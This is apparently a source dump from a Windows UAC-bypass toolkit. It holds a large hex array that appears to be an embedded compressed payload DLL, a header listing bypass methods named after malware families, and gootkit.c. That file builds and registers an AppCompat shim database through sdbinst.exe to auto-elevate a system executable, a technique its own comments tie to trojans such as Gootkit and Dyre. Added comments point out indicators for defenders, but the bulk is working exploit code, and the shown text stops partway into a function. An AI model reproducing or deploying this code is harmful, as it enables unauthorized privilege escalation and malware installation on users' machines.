154 | 0x3C, 0xC6, 0xB9, 0xC1, 0x27, 0x18, 0xEB, 0x52, 0x76, 0xDA, 0xEA, 0x21, 0x77, 0x32, 0xED, 0x4D,
155 | 0x15, 0xEB, 0xAE, 0xA1, 0x15, 0x8F, 0x6C, 0x29, 0x10, 0xE8, 0x42, 0x8B, 0x04, 0x64, 0x0E, 0xEB,
156 | 0x3C, 0x50, 0xDE, 0xE3, 0x51, 0x1C, 0xF8, 0x47, 0x78, 0xA4, 0x16, 0x30, 0x35, 0xCF, 0x14, 0x39,
157 | 0x75, 0xE9, 0x85, 0xDA, 0x37, 0x92, 0x79, 0x38, 0xF2, 0xC9, 0x60, 0xA1, 0x12, 0x1B, 0x7A, 0x7C,
158 | 0x61, 0x74, 0xAA, 0xFB, 0x43, 0x21, 0xD9, 0x32, 0x14, 0xA5, 0xEF, 0x92, 0x77, 0xCB, 0xDE, 0x55,
159 | 0x3D, 0x86, 0xC1, 0xBB, 0x29, 0x0E, 0x3E, 0x18, 0x1F, 0x8D, 0xA2, 0xE8, 0x6D, 0x84, 0x25, 0x49,
160 | 0x40, 0x2E, 0xA6, 0xA3, 0x02, 0x3F, 0x80, 0x13, 0x35, 0x80, 0x99, 0x37, 0x30, 0x8E, 0xF4, 0x54,
161 | 0x10, 0x87, 0xA6, 0xD0, 0x72, 0xA0, 0x4F, 0x8D, 0x70, 0x89, 0xAF, 0xEF, 0x03, 0x51, 0x68, 0x6A,
162 | 0x73, 0x64, 0xAB, 0xFC, 0x54, 0x38, 0xDB, 0x5F, 0x07, 0xAF, 0xD9, 0x58, 0x05, 0xA1, 0xFC, 0x48,
163 | 0x10, 0xF8, 0x41, 0xEA, 0xC7, 0xFA, 0x79, 0x55, 0x35, 0x8E, 0xB5, 0xEC, 0x02, 0x6E, 0x4C, 0x5A,
164 | 0x40, 0x01, 0xA8, 0xE7, 0x43, 0x47, 0x21, 0x77, 0xA6, 0xA9, 0xEA, 0x47, 0x15, 0xA1, 0xE4, 0x31,
165 | 0x5C, 0xE9, 0xB1, 0x73, 0x01, 0xE7, 0x6E, 0x4B, 0x78, 0x54, 0x89, 0x81, 0x8D, 0x07, 0x8A, 0x08,
166 | 0x33, 0x50, 0x87, 0xF6, 0x5E, 0x5C, 0xAB, 0x75, 0x14, 0xA9, 0xB9, 0x56, 0x23, 0xAF, 0xE9, 0x5B,
167 | 0x75, 0xCD, 0x96, 0xC6, 0x06, 0x86, 0x3C, 0x6E, 0x11, 0x8C, 0xB5, 0xE4, 0x02, 0x13, 0x45, 0x19,
168 | 0x5C, 0x0D, 0xBD, 0xFA, 0x47, 0x20, 0xF0, 0x49, 0x67, 0xCF, 0x94, 0x40, 0x23, 0xA7, 0xFC, 0x5D,
169 | 0x1A, 0x87, 0xD1, 0xD0, 0x33, 0xE7, 0x7F, 0x75, 0x1F, 0x84, 0xA5, 0xC1, 0x46, 0x68, 0x6D, 0x7B,
170 | 0x5E, 0x01, 0xCB, 0x50, 0x75, 0x4C, 0xFC, 0x47, 0x27, 0xBF, 0xEA, 0x56, 0x15, 0xBA, 0xFD, 0x7C,
171 | 0x18, 0x89, 0xB6, 0xD0, 0x46, 0xB4, 0x1C, 0x29, 0x05, 0xE0, 0xB0, 0xCD, 0x6C, 0x61, 0x41, 0x7C,
172 | 0x41, 0x17, 0xD9, 0xF2, 0x41, 0x29, 0xCE, 0x32, 0x75, 0x98, 0xFC, 0x41, 0x6F, 0xA3, 0xF4, 0x54,
173 | 0xF4, 0x80, 0xD1, 0xA3, 0x47, 0xF6, 0x1A, 0x11, 0x70, 0xE2, 0xC4, 0x80, 0x67, 0x2C, 0x0C, 0x19,
174 | 0x1A, 0x34, 0xE9, 0x93, 0x26, 0x1C, 0x11, 0x3A, 0xD2, 0x4C, 0x90, 0x33, 0xD0, 0x4E, 0x94, 0xBD,
175 | 0x66, 0x63, 0xD5, 0x35, 0xC6, 0x81, 0x1C, 0x31, 0xF6, 0x64, 0xC3, 0xDB, 0x71, 0x82, 0x0F, 0xBF,
176 | 0xB6, 0x67, 0x4C, 0x85, 0x00, 0xC8, 0x9E, 0x01, 0x33, 0x48, 0x9A, 0x2B, 0xE3, 0xCD, 0xCF, 0xBE,
177 | 0x77, 0xEA, 0x55, 0xA0, 0xA1, 0x5B, 0x98, 0x05, 0xAA, 0x64, 0xC3, 0xC1, 0x87, 0x0D, 0xC4, 0x9D,
178 | 0x35, 0xE1, 0xEE, 0x97, 0xE3, 0x4E, 0x99, 0xA6, 0x35, 0xB8, 0xF8, 0x41, 0x13, 0xCE, 0xE8, 0x4A,
179 | 0x3D, 0x86, 0xB7, 0xCC, 0x10, 0x8E, 0x5C, 0x04, 0x73, 0xA8, 0xA5, 0xE0, 0x73, 0x07, 0xAA, 0x19,
180 | 0x32, 0x64, 0x92, 0x92, 0x63, 0x34, 0xE9, 0x52, 0x08, 0xCC, 0xFD, 0x76, 0x09, 0xB8, 0xF4, 0x48,
181 | 0x1B, 0x86, 0xD1, 0xCE, 0x22, 0xE0, 0x68, 0x6B, 0x04, 0x92, 0xA9, 0x81, 0x6D, 0x61, 0x7F, 0x4E,
182 | 0x32, 0x99, 0xCA, 0xDC, 0x26, 0x39, 0xED, 0x43, 0x13, 0xB8, 0xDD, 0x56, 0x05, 0xCA, 0xE8, 0x5D,
183 | 0x37, 0xED, 0x86, 0xA3, 0x47, 0xF1, 0x1C, 0x78, 0x33, 0x8C, 0xAF, 0xF2, 0x66, 0x4E, 0x0C, 0x14,
184 | 0x5E, 0x6C, 0xAC, 0x93, 0x1E, 0x8E, 0x8B, 0x72, 0x0A, 0xA0, 0xF6, 0x3B, 0x04, 0xCE, 0xCA, 0xFA,
185 | 0x66, 0x81, 0xA5, 0xF3, 0x35, 0x6A, 0x73, 0x5B, 0xF0, 0xB0, 0xC0, 0x28, 0xC2, 0x1B, 0x08, 0x1A,
186 | 0xF3, 0x7F, 0xB9, 0x93, 0x26, 0x97, 0x99, 0xB0, 0xE1, 0xC8, 0x9C, 0xF3, 0x75, 0x85, 0x9D, 0x7F,
187 | 0x26, 0xA6, 0x94, 0xEF, 0x74, 0xBC, 0x32, 0x38, 0x14, 0x8C, 0xAC, 0x81, 0x03, 0x94, 0x0E, 0x4B,
188 | 0xB2, 0x01, 0xAE, 0xC2, 0x53, 0x29, 0xEB, 0x4A, 0xA4, 0xBF, 0x8D, 0x76, 0x1F, 0x8E, 0x95, 0xBF,
189 | 0xB5, 0xEC, 0x9E, 0xD3, 0x22, 0xDE, 0x72, 0x73, 0x15, 0x99, 0xC1, 0x85, 0x6B, 0xC7, 0x0F, 0x5D,
190 | 0x12, 0x01, 0xA5, 0xF6, 0x52, 0x29, 0xD9, 0x37, 0x31, 0xCC, 0x97, 0x67, 0xA6, 0xCD, 0x9F, 0x1E,
191 | 0xF4, 0xEB, 0xD1, 0xE2, 0x03, 0xD8, 0xE4, 0x79, 0x20, 0xA9, 0x05, 0x92, 0x46, 0x46, 0xF3, 0x18,
192 | 0x4D, 0x74, 0xB6, 0x83, 0x25, 0x33, 0x89, 0x58, 0x76, 0xC8, 0x89, 0x33, 0x67, 0x75, 0x8C, 0xBA,
193 | 0x74, 0xE8, 0x65, 0x81, 0x47, 0x8E, 0xA0, 0xD8, 0x70, 0x00, 0x88, 0x92, 0x03, 0x06, 0xC4, 0x79,
194 | 0x33, 0xDB, 0xC1, 0xAC, 0x22, 0xB3, 0xA6, 0x37, 0x59, 0xC8, 0xA6, 0x37, 0x58, 0xCA, 0xA2, 0x3E,
195 | 0x4B, 0xEC, 0xEE, 0xA7, 0x78, 0x8A, 0x83, 0x07, 0x74, 0xDF, 0xC4, 0xBE, 0x07, 0x39, 0x08, 0x2E,
196 | 0x36, 0x66, 0xC9, 0x53, 0x67, 0x45, 0x58, 0xA8, 0xE6, 0xD4, 0x19, 0x37, 0x5F, 0xCE, 0x9D, 0xBA,
197 | 0x25, 0x83, 0xD4, 0xA2, 0x47, 0x8F, 0x1C, 0x3A, 0x20, 0x10, 0xC2, 0x83, 0x66, 0xE6, 0x0E, 0x71,
198 | 0xC2, 0x66, 0xC0, 0x97, 0xA8, 0x4E, 0xB9, 0x36, 0x67, 0xC6, 0x99, 0xD2, 0x65, 0x5E, 0xBD, 0x3B,
199 | 0xD4, 0xA8, 0xD1, 0xA3, 0x49, 0x4E, 0x9D, 0x3F, 0x10, 0xE1, 0x81, 0x81, 0x63, 0x45, 0x0C, 0x19,
200 | 0x74, 0x19, 0x48, 0x9F, 0xC2, 0x4D, 0x59, 0x31, 0x52, 0xEC, 0x98, 0x65, 0x67, 0xCE, 0xCE, 0x3A,
201 | 0x2B, 0xE8, 0x87, 0xA3, 0x02, 0x8A, 0x1C, 0x6A, 0x50, 0xE1, 0x89, 0x81, 0x4C, 0x06, 0x42, 0x2C,
202 | 0xD2, 0x65, 0x80, 0x33, 0x26, 0x0A, 0xF9, 0x32, 0x27, 0xC9, 0x24, 0x37, 0x8F, 0x21, 0x63, 0x3A,
203 | 0xD4, 0xFB, 0xD8, 0x81, 0x53, 0x6E, 0x17, 0xDC, 0x70, 0x86, 0xFF, 0x00, 0x00, 0x64, 0x0C, 0x1D,
204 | 0x32, 0xAC, 0xC5, 0xB1, 0x24, 0x6C, 0x9C, 0x33, 0x64, 0xCD, 0x79, 0x3A, 0x13, 0xCE, 0xEF, 0x3A,
205 | 0x1D, 0xA8, 0xD1, 0xCD, 0x47, 0xE9, 0x1C, 0x7E, 0x90, 0xE0, 0xAC, 0x91, 0x03, 0x63, 0x0C, 0x50,
206 | 0x92, 0x65, 0xAF, 0x93, 0x49, 0x49, 0x39, 0x37, 0x9A, 0xAC, 0x88, 0x32, 0x67, 0xFE, 0x9D, 0x0E,
207 | 0x61, 0x88, 0xD1, 0x9A, 0xA5, 0x8E, 0x7E, 0x98, 0x70, 0xE0, 0xC0, 0xB3, 0x09, 0x06, 0x2D, 0x14,
208 | 0x71, 0x04, 0xCD, 0xFE, 0x26, 0x3C, 0x99, 0xB9, 0x07, 0x2C, 0x9C, 0x4A, 0xC7, 0xDF, 0xFC, 0x3A,
209 | 0x19, 0x48, 0xD6, 0xE2, 0xC6, 0x85, 0x49, 0x38, 0x37, 0xE0, 0xE0, 0xA1, 0x01, 0x69, 0x15, 0x79,
210 | 0x39, 0x10, 0xC9, 0xB3, 0x05, 0xCC, 0x9B, 0x7B, 0x66, 0xDC, 0x12, 0x93, 0x75, 0xAB, 0x91, 0x7E,
211 | 0x54, 0xED, 0xA2, 0xA3, 0x24, 0xEC, 0x13, 0x50, 0x00, 0xE0, 0xB4, 0xA1, 0x0C, 0x69, 0xAC, 0x11,
212 | 0x51, 0x63, 0x88, 0xC3, 0x26, 0x0F, 0x99, 0x7E, 0x86, 0xCF, 0xB9, 0x53, 0x6C, 0xBC, 0x8C, 0x5A,
213 | 0x78, 0x90, 0xD1, 0xDA, 0xE7, 0x87, 0x58, 0x38, 0x3C, 0xB5, 0xE0, 0x81, 0x03, 0xE6, 0x03, 0x11,
214 | 0xDA, 0x6C, 0x9F, 0x73, 0x22, 0x3E, 0x9D, 0x33, 0x15, 0x24, 0x9E, 0x02, 0x67, 0xE0, 0x9D, 0x03,
215 | 0xFF, 0x88, 0xD1, 0x42, 0x47, 0xBE, 0x1C, 0x32, 0x5E, 0xE0, 0xC7, 0x61, 0x06, 0x53, 0x6D, 0x03,
216 | 0x46, 0x06, 0xCC, 0xFD, 0xC6, 0x59, 0xF5, 0x9B, 0x73, 0x8A, 0x49, 0x33, 0x12, 0xCE, 0xFF, 0x0A,
217 | 0x74, 0x83, 0xE1, 0xA7, 0xB6, 0x89, 0xB4, 0x50, 0x70, 0xC2, 0x30, 0x83, 0x4F, 0xB6, 0x0E, 0x7E,
218 | 0xA0, 0x66, 0x64, 0xC2, 0x28, 0x3C, 0x89, 0x3B, 0x37, 0xDE, 0xFE, 0x83, 0x6B, 0xBA, 0xDD, 0x38,
219 | 0x25, 0xD7, 0xD0, 0x83, 0x47, 0xA6, 0x4C, 0x33, 0x59, 0x90, 0xCA, 0xB3, 0x46, 0x16, 0x06, 0x28,
220 | 0x22, 0x77, 0xE9, 0x93, 0x0B, 0x3C, 0x8B, 0x03, 0x56, 0xCC, 0xA8, 0x33, 0x52, 0x9E, 0x9C, 0x25,
221 | 0x65, 0xD6, 0xD1, 0x49, 0x4C, 0xFE, 0x1A, 0x77, 0x62, 0xF0, 0xA7, 0x31, 0x04, 0x75, 0x05, 0xEC,
222 | 0x23, 0x63, 0x18, 0x93, 0xF5, 0x58, 0x60, 0x3A, 0x48, 0xCC, 0xFD, 0x33, 0x0B, 0x6D, 0x8D, 0x3A,
223 | 0x05, 0xE2, 0xFD, 0xA3, 0x41, 0x7E, 0x1F, 0x68, 0x80, 0xE3, 0xEA, 0xEE, 0x53, 0x07, 0x79, 0xA9,
224 | 0x26, 0x10, 0x91, 0x9E, 0x26, 0x4C, 0x6D, 0x66, 0x66, 0xB9, 0x8D, 0x33, 0xB7, 0xC6, 0xAC, 0x29,
225 | 0xCF, 0xEA, 0x4C, 0xB0, 0x92, 0xF3, 0x0F, 0x7C, 0x30, 0xE6, 0xC1, 0xD1, 0x24, 0x67, 0x1C, 0x1F,
226 | 0x67, 0x6D, 0xE8, 0x04, 0x07, 0x4C, 0x99, 0x17, 0x66, 0x0C, 0xB4, 0x33, 0x33, 0xE5, 0x4D, 0x3B,
227 | 0x85, 0xF7, 0xA2, 0xF3, 0x4E, 0xEF, 0x66, 0x24, 0x79, 0xE4, 0xC0, 0x31, 0x07, 0x3A, 0x33, 0x61,
228 | 0x5F, 0x08, 0xE9, 0x83, 0x50, 0x29, 0xEB, 0x40, 0xF6, 0x5A, 0xA4, 0x14, 0x56, 0xCE, 0xB3, 0x0A,
229 | 0x53, 0xC8, 0xB4, 0xCD, 0x24, 0xE1, 0x1E, 0x5C, 0xB0, 0x97, 0xFD, 0xA6, 0x56, 0x52, 0x4A, 0x34,
230 | 0x12, 0x5C, 0xEE, 0xB3, 0x55, 0x38, 0xF9, 0x45, 0x07, 0xA0, 0x99, 0x5C, 0x09, 0xAB, 0xA0, 0x1D,
231 | 0x0D, 0x8D, 0xA2, 0x23, 0x60, 0xB1, 0x22, 0x35, 0x7A, 0xDC, 0xA1, 0x01, 0x88, 0x26, 0x61, 0x7B,
232 | 0x5E, 0x1D, 0xE9, 0x93, 0x22, 0x22, 0xEA, 0x33, 0x5B, 0xEB, 0xEC, 0x41, 0x09, 0xF4, 0xEE, 0x59,
233 | 0x74, 0x80, 0xB4, 0xCE, 0x26, 0xFD, 0x31, 0x55, 0x19, 0xE0, 0xA3, 0xF3, 0x6C, 0x75, 0x63, 0x7F,
234 | 0x46, 0x49, 0xC9, 0xF0, 0x49, 0x21, 0xA3, 0x52, 0x15, 0xA1, 0xB7, 0x33, 0x11, 0xFF, 0xBA, 0x1A,
235 | 0x19, 0x89, 0xBF, 0xCA, 0x27, 0xE8, 0x79, 0x4B, 0x04, 0xB6, 0x19, 0x87, 0xA3, 0x02, 0x2C, 0x99,
236 | 0x12, 0x58, 0xBD, 0xE1, 0x53, 0x3F, 0xED, 0x42, 0xE7, 0x01, 0x4D, 0x37, 0x45, 0x11, 0x99, 0xE0,
237 | 0x70, 0xDB, 0xF3, 0xD1, 0x44, 0x1E, 0x1F, 0x38, 0x03, 0x85, 0xA3, 0xF4, 0x71, 0x6F, 0x78, 0x60,
238 | 0x71, 0x90, 0xC9, 0x83, 0x27, 0x3E, 0xFC, 0x42, 0x13, 0x9C, 0x9F, 0x56, 0x67, 0xAA, 0xCD, 0x48,
239 | 0x1D, 0x9E, 0xB8, 0xCF, 0x22, 0x16, 0x7B, 0x5D, 0x03, 0x26, 0xC1, 0x68, 0x02, 0x43, 0x74, 0xB9,
240 | 0x31, 0x66, 0xBD, 0xF3, 0x29, 0x00, 0xFC, 0x45, 0x03, 0xA0, 0xB9, 0x31, 0x0B, 0x9F, 0x9D, 0x07,
241 | 0x53, 0x89, 0xA2, 0xEA, 0x29, 0x8E, 0x6A, 0x57, 0x1B, 0x85, 0xB2, 0xA6, 0x23, 0x73, 0x04, 0x70,
242 | 0x73, 0x07, 0x88, 0x17, 0x1B, 0x6B, 0xFF, 0x52, 0x26, 0xA0, 0xEA, 0x56, 0x40, 0xEE, 0xB2, 0x7D,
243 | 0x72, 0xC7, 0x42, 0xFC, 0x41, 0xDB, 0x1A, 0x04, 0x5F, 0xDA, 0xC9, 0xBD, 0x2C, 0xC0, 0x01, 0xE0,
244 | 0xD2, 0x67, 0xF5, 0xBC, 0x53, 0x5F, 0x59, 0x33, 0x27, 0xEE, 0xA6, 0x33, 0x78, 0xCF, 0x62, 0x25,
245 | 0x75, 0xF7, 0xD0, 0xBC, 0x46, 0x91, 0x1D, 0x27, 0x71, 0xFF, 0xC1, 0x9E, 0x02, 0x19, 0x0D, 0x26,
246 | 0x2D, 0x65, 0xD6, 0x92, 0x39, 0x4D, 0x86, 0x32, 0x79, 0xCD, 0x87, 0x32
247 | };
248 |
--------------------------------------------------------------------------------
/BypassUAC/global.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * TITLE: GLOBAL.H
4 | *
5 | * VERSION: 2.01
6 | *
7 | * DATE: 04 Jan 2016
8 | *
9 | * Common header file for the program support routines.
10 | *
11 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
12 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
13 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
14 | * PARTICULAR PURPOSE.
15 | *
16 | *******************************************************************************/
17 | #pragma once
18 |
19 | // Disable compiler warnings that are not meaningful for this project.
20 | #pragma warning(disable: 4005) // macro redefinition
21 | #pragma warning(disable: 4055) // %s : from data pointer %s to function pointer %s
22 | #pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression
23 | #pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
24 | #pragma warning(disable: 6102) // Using %s from failed function call at line %u
25 | #pragma warning(disable: 6320) //exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER
26 |
27 | #define GENERATE_COMPRESSED_PAYLOAD
28 | #ifndef _DEBUG
29 | #undef GENERATE_COMPRESSED_PAYLOAD
30 | #endif
31 |
32 | #ifdef _WIN64
33 | #include "fubuki64comp.h"
34 | #include "hibiki64comp.h"
35 | #include "kongou64comp.h"
36 | #define FUBUKIDLL Fubuki64Comp
37 | #define HIBIKIDLL Hibiki64Comp
38 | #define KONGOUDLL Kongou64Comp
39 | #else
40 | #include "fubuki32comp.h"
41 | #include "hibiki32comp.h"
42 | #include "kongou32comp.h"
43 | #define FUBUKIDLL Fubuki32Comp
44 | #define HIBIKIDLL Hibiki32Comp
45 | #define KONGOUDLL Kongou32Comp
46 | #endif
47 |
/*
 * Selector for the method the program runs; the chosen value is carried in
 * UACMECONTEXT.Method (declared further down in this header).
 *
 * The numbering is written out explicitly so it can be read at a glance:
 * values start at 1 and are contiguous, and UacMethodMax is a sentinel one
 * past the last real method (presumably used as an exclusive upper bound
 * when validating a method number — confirm against the caller).
 */
typedef enum _UACBYPASSMETHOD {
    UacMethodSysprep1    = 1,
    UacMethodSysprep2    = 2,
    UacMethodOobe        = 3,
    UacMethodRedirectExe = 4,
    UacMethodSimda       = 5,
    UacMethodCarberp1    = 6,
    UacMethodCarberp2    = 7,
    UacMethodTilon       = 8,
    UacMethodAVrf        = 9,
    UacMethodWinsat      = 10,
    UacMethodShimPatch   = 11,
    UacMethodSysprep3    = 12,
    UacMethodMMC         = 13,
    UacMethodSirefef     = 14,
    UacMethodGeneric     = 15,
    UacMethodGWX         = 16,
    UacMethodMax         = 17
} UACBYPASSMETHOD;
67 |
68 | #include
69 | #include
70 | #include "..\shared\ntos.h"
71 | #include "..\shared\minirtl.h"
72 | #include "consts.h"
73 | #include "compress.h"
74 | #include "sup.h"
75 | #include "inject.h"
76 | #include "cmdline.h"
77 | #include "pitou.h"
78 | #include "gootkit.h"
79 | #include "simda.h"
80 | #include "carberp.h"
81 | #include "hybrids.h"
82 |
83 |
84 |
/*
 * Process-wide state shared by the support routines. The single instance is
 * g_ctx, declared extern below this struct and defined in another
 * translation unit; which code fills each field is not visible in this header.
 */
typedef struct _UACME_CONTEXT {
    BOOL IsWow64;                          // NOTE(review): by name, set when running as a 32-bit process on 64-bit Windows — confirm against the initializer
    UACBYPASSMETHOD Method;                // method selected for this run (see _UACBYPASSMETHOD above)
    HINSTANCE hKernel32;                   // module handles; by name kernel32 / ole32 / shell32 — where they are loaded is not shown here
    HINSTANCE hOle32;
    HINSTANCE hShell32;
    PVOID PayloadDll;                      // payload image in memory ...
    ULONG PayloadDllSize;                  // ... and its length (presumably in bytes); the two fields travel together
    RTL_OSVERSIONINFOW osver;              // OS version record; filled elsewhere
    WCHAR szSystemDirectory[MAX_PATH + 1]; // system directory path; likely sized MAX_PATH + 1 so a MAX_PATH-character path fits with its terminator
} UACMECONTEXT, *PUACMECONTEXT;
96 |
97 | extern UACMECONTEXT g_ctx;
98 |
--------------------------------------------------------------------------------
/BypassUAC/gootkit.c:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2014 - 2016,
4 | * (C) Original idea (?) mzH,
5 | * (C) MS FixIT Shim Patches revealed by Jon Erickson
6 | *
7 | * TITLE: GOOTKIT.C
8 | *
9 | * VERSION: 2.00
10 | *
11 | * DATE: 16 Nov 2015
12 | *
13 | * Gootkit based AutoElevation using AppCompat.
14 | *
15 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
16 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
17 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
18 | * PARTICULAR PURPOSE.
19 | *
20 | *******************************************************************************/
21 |
22 | #include "global.h"
23 | #include "apphelp.h"
24 | #include "inazuma32.h"
25 |
// Module handle for the library that exports the Sdb* API (apphelp.dll on
// Windows). The caller must load it before ucmInitAppHelp() is called;
// ucmInitAppHelp() passes it straight to GetProcAddress without checking it.
HMODULE hAppHelp;

// Sdb* entry points, resolved at run time by ucmInitAppHelp() via GetProcAddress.
// They are file-scope globals with no initializer, so they start out NULL. If
// ucmInitAppHelp() fails part-way, the pointers resolved before the failing
// lookup remain set while the later ones keep their previous value.
pfnSdbCreateDatabase SdbCreateDatabase;
pfnSdbWriteDWORDTag SdbWriteDWORDTag;
pfnSdbWriteStringTag SdbWriteStringTag;
pfnSdbWriteBinaryTag SdbWriteBinaryTag;
pfnSdbEndWriteListTag SdbEndWriteListTag;
pfnSdbBeginWriteListTag SdbBeginWriteListTag;
pfnSdbCloseDatabaseWrite SdbCloseDatabaseWrite;
pfnSdbStartIndexing SdbStartIndexing;
pfnSdbStopIndexing SdbStopIndexing;
pfnSdbCommitIndexes SdbCommitIndexes;
pfnSdbDeclareIndex SdbDeclareIndex;

// Fixed strings used by the shim-database routines in this file (their uses
// are further down). Because they are compiled in verbatim, they are also
// static indicators a defender can search for in a suspicious .sdb file or in
// this binary.
static const WCHAR SHIMPATCH_BINARYNAME[] = L"binarypatch01";
static const WCHAR SHIMPATCH_EXENAME[] = L"iscsicli.exe";
static const WCHAR SHIMPATCH_MSFTFULL[] = L"Microsoft Corporation";
// Format string; %ws is filled with the system directory (see ucmShimRedirectEXE).
static const WCHAR SHIM_SDBINSTALLER[] = L"%ws\\sdbinst.exe";
44 |
/*
* ucmInitAppHelp
*
* Purpose:
*
* Initialize AppHelp routines.
*
* Resolves the eleven Sdb* exports this file needs from the global hAppHelp
* and stores them in the file-scope function pointers declared above.
*
* Parameters: none. Reads the global hAppHelp, which the caller must have
* loaded beforehand; it is not validated here.
*
* Return: TRUE when every export was found; FALSE as soon as one
* GetProcAddress call returns NULL. On FALSE the pointers resolved before
* the failing lookup stay set and the remaining ones are left untouched.
* No error code is recorded, so the caller cannot tell which export was missing.
*
*/
BOOL ucmInitAppHelp(
    VOID
    )
{
    BOOL bResult = FALSE;
    BOOL cond = FALSE;  // never modified, so the do/while below runs exactly once;
                        // each "break" is simply an early exit from the sequence

    do {
        SdbCreateDatabase = (pfnSdbCreateDatabase)GetProcAddress(hAppHelp, "SdbCreateDatabase");
        if (SdbCreateDatabase == NULL) {
            break;
        }

        SdbBeginWriteListTag = (pfnSdbBeginWriteListTag)GetProcAddress(hAppHelp, "SdbBeginWriteListTag");
        if (SdbBeginWriteListTag == NULL) {
            break;
        }

        SdbEndWriteListTag = (pfnSdbEndWriteListTag)GetProcAddress(hAppHelp, "SdbEndWriteListTag");
        if (SdbEndWriteListTag == NULL) {
            break;
        }

        SdbWriteStringTag = (pfnSdbWriteStringTag)GetProcAddress(hAppHelp, "SdbWriteStringTag");
        if (SdbWriteStringTag == NULL) {
            break;
        }

        SdbCloseDatabaseWrite = (pfnSdbCloseDatabaseWrite)GetProcAddress(hAppHelp, "SdbCloseDatabaseWrite");
        if (SdbCloseDatabaseWrite == NULL) {
            break;
        }

        SdbWriteBinaryTag = (pfnSdbWriteBinaryTag)GetProcAddress(hAppHelp, "SdbWriteBinaryTag");
        if (SdbWriteBinaryTag == NULL) {
            break;
        }

        SdbWriteDWORDTag = (pfnSdbWriteDWORDTag)GetProcAddress(hAppHelp, "SdbWriteDWORDTag");
        if (SdbWriteDWORDTag == NULL) {
            break;
        }

        SdbDeclareIndex = (pfnSdbDeclareIndex)GetProcAddress(hAppHelp, "SdbDeclareIndex");
        if (SdbDeclareIndex == NULL) {
            break;
        }

        SdbStartIndexing = (pfnSdbStartIndexing)GetProcAddress(hAppHelp, "SdbStartIndexing");
        if (SdbStartIndexing == NULL) {
            break;
        }

        SdbStopIndexing = (pfnSdbStopIndexing)GetProcAddress(hAppHelp, "SdbStopIndexing");
        if (SdbStopIndexing == NULL) {
            break;
        }

        SdbCommitIndexes = (pfnSdbCommitIndexes)GetProcAddress(hAppHelp, "SdbCommitIndexes");
        if (SdbCommitIndexes == NULL) {
            break;
        }

        // Only reached when all eleven lookups succeeded.
        bResult = TRUE;

    } while (cond);

    return bResult;
}
122 |
/*
* ucmRegisterAndRunTarget
*
* Purpose:
*
* Register shim database and execute target app.
*
* Sequence: launch lpSdbinstPath to install lpShimDbPath (prefixed with "-p"
* when IsPatch is set), launch the target, then launch lpSdbinstPath again
* with "/q /u" to uninstall the database and finally delete the .sdb file.
*
* Parameters:
*   lpSystemDirectory - substituted into lpTarget by wsprintfW.
*   lpSdbinstPath     - path of the sdbinst executable to launch.
*   lpShimDbPath      - path of the .sdb file to register and later remove.
*   lpTarget          - used verbatim as the wsprintfW format string that
*                       yields the target executable path; callers are
*                       expected to pass a format with a single %ws.
*   IsPatch           - when TRUE, sdbinst receives "-p" before the database path.
*
* Return: FALSE if any pointer parameter is NULL or the sdbinst install
* step fails; otherwise the result of launching the target. The uninstall
* run and DeleteFileW are not checked, so a TRUE return does not guarantee
* the database was actually removed.
*
* From a defensive standpoint the observable footprint is two sdbinst
* launches (install, then "/q /u") bracketing the target launch, followed
* by deletion of the .sdb file.
*
*/
BOOL ucmRegisterAndRunTarget(
    _In_ LPWSTR lpSystemDirectory,
    _In_ LPWSTR lpSdbinstPath,
    _In_ LPWSTR lpShimDbPath,
    _In_ LPWSTR lpTarget,
    _In_ BOOL IsPatch
    )
{
    BOOL bResult = FALSE;
    WCHAR szTempDirectory[MAX_PATH * 2];
    WCHAR szCmd[MAX_PATH * 4];

    // All four string parameters are required; bResult is still FALSE here.
    if ((lpTarget == NULL) ||
        (lpSystemDirectory == NULL) ||
        (lpSdbinstPath == NULL) ||
        (lpShimDbPath == NULL)
        )
    {
        return bResult;
    }

    // Build the sdbinst command line. NOTE(review): wsprintf/wsprintfW take no
    // buffer size, so these calls rely on the output fitting in szCmd and
    // szTempDirectory. wsprintf (TCHAR form) is mixed with wsprintfW below;
    // the L"..." literals imply a UNICODE build in which both are the same call.
    RtlSecureZeroMemory(szCmd, sizeof(szCmd));
    if (IsPatch) {
        wsprintf(szCmd, L"-p %ws", lpShimDbPath);
    }
    else {
        _strcpy_w(szCmd, lpShimDbPath);
    }

    //register shim, sdbinst.exe
    if (supRunProcess(lpSdbinstPath, szCmd)) {
        // lpTarget itself is the format string; lpSystemDirectory fills its %ws.
        RtlSecureZeroMemory(szTempDirectory, sizeof(szTempDirectory));
        wsprintfW(szTempDirectory, lpTarget, lpSystemDirectory);
        bResult = supRunProcess(szTempDirectory, NULL);

        //remove database
        // Best-effort cleanup: neither the uninstall run nor DeleteFileW is
        // checked, and bResult is not affected by their outcome.
        RtlSecureZeroMemory(szCmd, sizeof(szCmd));
        wsprintf(szCmd, L"/q /u %ws", lpShimDbPath);
        supRunProcess(lpSdbinstPath, szCmd);
        DeleteFileW(lpShimDbPath);
    }
    return bResult;
}
174 |
/*
* ucmShimRedirectEXE
*
* Purpose:
*
* Build, register shim database and execute target app.
* Initially used in BlackEnergy2 and Gootkit by mzH (alive-green).
* Currently used in number of trojans (Win32/Dyre, WinNT/Cridex).
*
* Parameters:
*
* lpszPayloadEXE - command line stored in the RedirectEXE shim (TAG_COMMAND_LINE).
*
* Return:
*
* Result of ucmRegisterAndRunTarget, FALSE on any earlier failure.
*
* Note:
*
* The database is written to %temp%\pe386.sdb with TAG_NAME "pe386" and an EXE
* entry matching cliconfg.exe; the target launched is "<system dir>\cliconfg.exe".
* Return values of the Sdb* write calls are not checked, so a partially written
* database still reaches sdbinst.exe. The apphelp function pointers used here
* must have been resolved by ucmInitAppHelp beforehand.
*
*/
BOOL ucmShimRedirectEXE(
    LPWSTR lpszPayloadEXE
    )
{
